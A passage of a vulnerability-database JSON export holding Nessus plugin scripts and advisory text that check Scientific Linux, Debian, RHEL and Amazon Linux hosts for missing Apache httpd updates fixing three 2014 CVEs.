audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ssl\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:22:09", "bulletinFamily": "scanner", "description": "A race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the 'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the 'DEFLATE' input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAfter installing the updated packages, the httpd daemon will be restarted automatically.", "modified": "2018-12-28T00:00:00", "id": "SL_20140723_HTTPD_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76753", "published": "2014-07-24T00:00:00", "title": "Scientific Linux Security Update : httpd on SL5.x, SL6.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76753);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/12/28 10:10:35\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL5.x, SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAfter installing the updated packages, the httpd daemon will be\nrestarted automatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1407&L=scientific-linux-errata&T=0&P=1884\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6a0123d9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"httpd-2.2.3-87.sl5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-debuginfo-2.2.3-87.sl5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-devel-2.2.3-87.sl5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-manual-2.2.3-87.sl5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"mod_ssl-2.2.3-87.sl5\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"httpd-2.2.15-31.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-debuginfo-2.2.15-31.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-devel-2.2.15-31.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-manual-2.2.15-31.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-tools-2.2.15-31.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mod_ssl-2.2.15-31.sl6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:22:10", "bulletinFamily": "scanner", "description": "Several security issues were found in the Apache HTTP server.\n\n - CVE-2014-0118 The DEFLATE input filter (inflates request bodies) in mod_deflate allows remote attackers to cause a denial of service (resource consumption) via crafted request data that decompresses to a much larger size.\n\n - CVE-2014-0226 A race condition was found in mod_status. An attacker able to access a public server status page on a server could send carefully crafted requests which could lead to a heap buffer overflow, causing denial of service, disclosure of sensitive information, or potentially the execution of arbitrary code.\n\n - CVE-2014-0231 A flaw was found in mod_cgid. If a server using mod_cgid hosted CGI scripts which did not consume standard input, a remote attacker could cause child processes to hang indefinitely, leading to denial of service.", "modified": "2018-11-10T00:00:00", "id": "DEBIAN_DSA-2989.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76844", "published": "2014-07-26T00:00:00", "title": "Debian DSA-2989-1 : apache2 - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2989. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76844);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/11/10 11:49:36\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_bugtraq_id(68678, 68742, 68745);\n script_xref(name:\"DSA\", value:\"2989\");\n\n script_name(english:\"Debian DSA-2989-1 : apache2 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several security issues were found in the Apache HTTP server.\n\n - CVE-2014-0118\n The DEFLATE input filter (inflates request bodies) in\n mod_deflate allows remote attackers to cause a denial of\n service (resource consumption) via crafted request data\n that decompresses to a much larger size.\n\n - CVE-2014-0226\n A race condition was found in mod_status. An attacker\n able to access a public server status page on a server\n could send carefully crafted requests which could lead\n to a heap buffer overflow, causing denial of service,\n disclosure of sensitive information, or potentially the\n execution of arbitrary code.\n\n - CVE-2014-0231\n A flaw was found in mod_cgid. If a server using mod_cgid\n hosted CGI scripts which did not consume standard input,\n a remote attacker could cause child processes to hang\n indefinitely, leading to denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-0118\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-0226\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-0231\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/apache2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-2989\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the apache2 packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 2.2.22-13+deb7u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"apache2\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-dbg\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-doc\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-event\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-itk\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-prefork\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-worker\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-prefork-dev\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-suexec\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-suexec-custom\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-threaded-dev\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-utils\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2.2-bin\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2.2-common\", reference:\"2.2.22-13+deb7u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:22:09", "bulletinFamily": "scanner", "description": "Updated httpd packages that fix three security issues are now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the 'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the 'DEFLATE' input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "modified": "2018-11-10T00:00:00", "id": "REDHAT-RHSA-2014-0920.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76749", "published": "2014-07-24T00:00:00", "title": "RHEL 5 / 6 : httpd (RHSA-2014:0920)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0920. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76749);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/10 11:49:53\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_xref(name:\"RHSA\", value:\"2014:0920\");\n\n script_name(english:\"RHEL 5 / 6 : httpd (RHSA-2014:0920)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling the updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0920\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0231\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0118\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0226\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0920\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"httpd-debuginfo-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"httpd-devel-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-manual-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-manual-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-manual-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"mod_ssl-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"mod_ssl-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.3-87.el5_10\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-debuginfo-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-devel-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-manual-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-tools-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-tools-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-tools-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mod_ssl-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mod_ssl-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.15-31.el6_5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:22:32", "bulletinFamily": "scanner", "description": "A race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the 'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the 'DEFLATE' input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely. (CVE-2014-0231)", "modified": "2018-04-18T00:00:00", "id": "ALA_ALAS-2014-389.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78332", "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : httpd24 (ALAS-2014-389)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-389.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78332);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_xref(name:\"ALAS\", value:\"2014-389\");\n\n script_name(english:\"Amazon Linux AMI : httpd24 (ALAS-2014-389)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-389.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd24' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-debuginfo-2.4.10-1.59.amzn1\")) flag++;\nif 